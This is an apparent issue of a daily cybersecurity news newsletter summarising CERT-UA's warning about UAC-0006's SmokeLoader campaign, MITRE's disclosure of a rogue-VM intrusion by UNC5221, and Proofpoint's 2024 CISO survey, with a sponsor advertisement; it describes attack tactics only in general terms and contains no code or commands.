May 30 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter thatโs always bring the ๐ฅ cyber stories ๐๐๐
Todayโs hottest cybersecurity news stories:
๐จ Be afraid says CERT-UA of UAC-0006โs malware campaign โฃ๏ธ
๐ฅ Mitre attack: Rogue VMS allowed hackers to evade detection ๐ค
๐คฆโโ๏ธ Human error is still the proverbial achilles heal of cybersecurity ๐คฌ
The Computer Emergency Response Team of Ukraine (CERT-UA) has issued a warning about a significant increase in cyberattacks linked to the financially-motivated threat actor UAC-0006.
Threat Actor Overview ๐ต๏ธ
Group: UAC-0006
Active Since: At least 2013
ย Primary Targets: Accountantsโ PCs used for financial activities, including remote banking systems.
Main Activities: Stealing credentials and making unauthorised fund transfers.
Recent Campaigns ๐
Start Date: May 20, 2024
Campaigns: At least two major campaigns distributing SmokeLoader malware via email.
Tactics:
Emails with ZIP archives containing IMG files, which hide EXE malware and ACCDB documents.
Weaponized Microsoft Access files that execute malicious macros.
PowerShell commands used to download and run EXE files.
Malware Involved ๐ฆ
SmokeLoader: Acts as a loader for other malware. Injects malicious code into the explorer process and downloads additional payloads.
TALESHOT and RMS: Downloaded post initial infection to further compromise the system.
Botnet Operations ๐ค
Size: Several hundred infected machines.
Potential Actions: CERT-UA suspects imminent fraudulent activities involving remote banking systems.
CERT-UA Recommendations ๐ก๏ธ
Target Audience: Ukrainian CEOs and IT departments.
Recommendations:
Enhance cybersecurity measures for accountantsโ automated workplaces.
Implement proper security policies and protection mechanisms.
Monitor for indicators of compromise provided by CERT-UA.
Historical Context ๐ฐ๏ธ
Previous Warnings: In May 2023, CERT-UA alerted about a phishing campaign using SmokeLoader in the form of a polyglot file.
Financial Impact: UAC-0006 has attempted to steal tens of millions of hryvnias through mass online theft campaigns between August and October 2023.
Further Reading ๐
CERT-UA has published detailed articles on UAC-0006โs tactics, techniques, and procedures (TTPs) to help organisations better understand and defend against this persistent threat.
Conclusion ๐ก๏ธ
The recent surge in cyberattacks by UAC-0006 targeting Ukraine's financial sector underscores the critical need for robust cybersecurity measures. Organisations, particularly those involved in financial operations, must stay vigilant and implement comprehensive security protocols to safeguard against these sophisticated attacks.
Spending hours gathering evidence, tracking risk, and answering security questionnaires? Move away from manual work by automating key GRC program needs with Vanta.
Automate evidence collection across 21+ frameworks including SOC 2 and ISO 27001 with continuous monitoring
Centralize risk and report on program impact to internal teams
Create your own Trust Center to proactively manage buyer needs
Leverage AI to answer security questionnaires faster
Join Vantaโs webinar on June 11 to learn more about scaling your GRC program with automation and AI.
The MITRE Corporation has released new details about a significant cyberattack that occurred in December 2023. This breach was disclosed in April 2024, revealing that a China-linked nation-state actor, UNC5221, infiltrated MITREโs systems by exploiting two Ivanti Connect Secure zero-day vulnerabilities.
Timeline and Initial Response ๐
Date of Breach: January 2024
Discovery: The security team detected unauthorised activities and promptly took mitigation steps, including taking the affected Networked Experimentation, Research, and Virtualization Environment (NERVE) offline.
Action Taken: Third-party forensics and internal experts were engaged for a thorough investigation. Authorities and affected parties were notified, and operational alternatives for collaboration were initiated.
Modus Operandi ๐ต๏ธ
Exploitation Method: Threat actors leveraged Ivanti Connect Secure vulnerabilities to gain access.
Infiltration: Attackers created rogue virtual machines (VMs) within MITREโs VMware environment using compromised vCenter Server access.
Tools and Techniques:
Deployed a JSP web shell (BEEFLUSH) under the vCenter Serverโs Tomcat server.
Used a Python-based tunnelling tool to facilitate SSH connections between rogue VMs and the ESXi hypervisor infrastructure.
Advanced Tactics ๐
Evasion: By creating rogue VMs, the adversaries evaded detection from centralised management interfaces like vCenter, maintaining control over compromised systems.
Persistence: On January 7, 2024, they deployed malicious payloads, including the BRICKSTORM backdoor and the BEEFLUSH web shell, ensuring persistent access and arbitrary command execution.
Techniques: Manipulated SSH and scripts to control compromised systems.
Exploited the default VMware account (VPXUSER) to list drives, create new VMs, and execute payloads.
Used SFTP to write files and /bin/vmx to execute them, remaining invisible to standard management interfaces.
Subsequent Payloads ๐ฆ
Additional malicious payloads such as WIREFIRE (aka GIFTEDVISITOR) and BUSHWALK web shells were deployed for data exfiltration.
Mitigation and Recommendations ๐ ๏ธ
Scripts Released:
Invoke-HiddenVMQuery: A PowerShell script to detect malicious activities by scanning for anomalous invocations of the /bin/vmx binary.
VirtualGHOST: Another tool to help identify and mitigate threats within the VMware environment.
Key Points:
Simply using hypervisor management interfaces is insufficient for dealing with rogue VMs.
Special tools and techniques are required to effectively identify and manage rogue VMs, which operate outside standard security policies.
Conclusion and Call to Action ๐ข
MITRE emphasises the need for vigilance and adaptability in defending against evolving cyber threats. By understanding and countering new adversary behaviours, organisations can bolster their defences and safeguard critical assets from future intrusions.
Takeaway ๐ฅก
Stay Updated: Regularly update systems and follow vendor recommendations.
Vigilance: Continuously monitor for anomalous activities and potential threats.
Proactive Defence: Implement robust security measures, including the use of specialised tools for detecting rogue VMs.
By enhancing awareness and implementing proactive security strategies, organisations can better protect themselves from sophisticated cyberattacks.
According to Proofpoint's 2024 Voice of the CISO report, while fears of cyberattacks continue to rise, Chief Information Security Officers (CISOs) are demonstrating increasing confidence in their ability to defend against these threats. ๐ผ๐ก๏ธ
Key Findings ๐
Rising Confidence: 70% of CISOs feel at risk of a material cyberattack in the next 12 months, up from 68% in 2023 and 48% in 2022. However, only 43% feel unprepared for a targeted attack, a significant drop from 61% in 2023 and 50% in 2022. ๐๐
Human Error: Human error remains the most significant vulnerability, with 74% of CISOs identifying it as a major concern. Despite this, 86% believe employees understand their role in protecting the organisation. ๐ฅโ ๏ธ
AI Solutions: 87% of CISOs are looking to deploy AI-powered capabilities to mitigate human-centric risks and advanced threats. ๐ค๐ก๏ธ
Top Threats: The biggest perceived threats in 2024 are ransomware (41%), malware (38%), and email fraud (36%). ๐ฆ ๐ง
Generative AI Risks: 54% of CISOs believe generative AI poses a security risk, with tools like ChatGPT, collaboration platforms, and Microsoft 365 seen as top concerns. ๐คโ ๏ธ
Strategic Shifts ๐
Increased Investment: There is a notable increase in data loss prevention technology (DLP) and employee education on data security best practices. ๐๐
Board Alignment: 84% of CISOs report that their board members align with them on cybersecurity issues, up from 62% in 2023. ๐๏ธ๐ค
CISO Burnout: Burnout among CISOs has decreased slightly, but 66% still feel excessive expectations, and 72% would not join an organisation without Directors & Officers (D&O) insurance. โ ๏ธ๐
Challenges and Adaptations ๐
Economic Impact: 59% of CISOs report that the economic downturn has hampered their ability to make critical investments, with many facing budget cuts and staff reductions. ๐ธ๐
Proactive Measures: CISOs are increasingly focused on strategic defences, including enhanced education and technological adoption, to counter evolving threats. ๐ก๏ธ๐ก
Conclusion
Ryan Kalember, Chief Strategy Officer at Proofpoint, emphasises the need for vigilance and adaptation in the face of ongoing challenges. The report underscores a shift towards greater resilience and preparedness among CISOs globally. ๐๐
๐๏ธ Extra, Extra! Read all about it! ๐๏ธ
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
๐ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐
๐ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐
๐ย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐พ
Let us know what you think.
So long and thanks for reading all the phish!
